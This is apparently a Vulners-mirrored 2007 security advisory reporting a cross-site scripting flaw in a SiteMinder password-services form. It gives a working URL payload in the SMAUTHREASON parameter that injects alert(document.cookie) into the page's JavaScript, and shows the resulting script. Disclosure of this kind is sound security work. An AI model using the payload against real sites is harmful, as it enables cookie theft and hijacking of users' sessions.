Lucene search
K

siteminder-xss.txt

🗓️ 07 Nov 2007 00:00:00Reported by Giuseppe GottardiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Exploit in siteminderagent/forms/smpwservices.fcc: Cross Site Scripting (Code) allows injection of alert() code in resetCredFields function

Code
`# Exploit in [XSS]:  
  
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]  
  
  
# Cross Site Scripting (Code):  
  
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0  
  
In this way we can inject the alert() code without brackets in the  
function resetCredFields().  
  
  
-------------------------------  
function resetCredFields()  
{  
  
if (1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 0 || 1)  
{  
alert(document.cookie);  
}  
}  
function drop(){  
  
if( 0 == 4 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 5 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 28 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 30 )  
{  
document.PWChange.PASSWORD.value = '';  
}  
else if (1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 1 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 18 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 20 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 22 || 1)  
{  
alert(document.cookie);  
}  
}  
  
function drop(){  
  
if( 0 == 31 || 1)  
{  
alert(document.cookie);  
}  
}  
function drop(){  
  
if( 0 == 34)  
{  
document.PWChange.NEWPASSWORD.value = '';  
document.PWChange.CONFIRMATION.value = '';  
}  
}  
...  
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>  
-------------------------------  
  
  
Regards,  
Giuseppe Gottardi (aka oveRet)  
  
---  
Giuseppe Gottardi  
Senior Security Engineer at Communication Valley S.p.A.  
E-mail: [email protected]  
Web: http://overet.securitydate.it  
  
Wednesday November 07, 2007.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation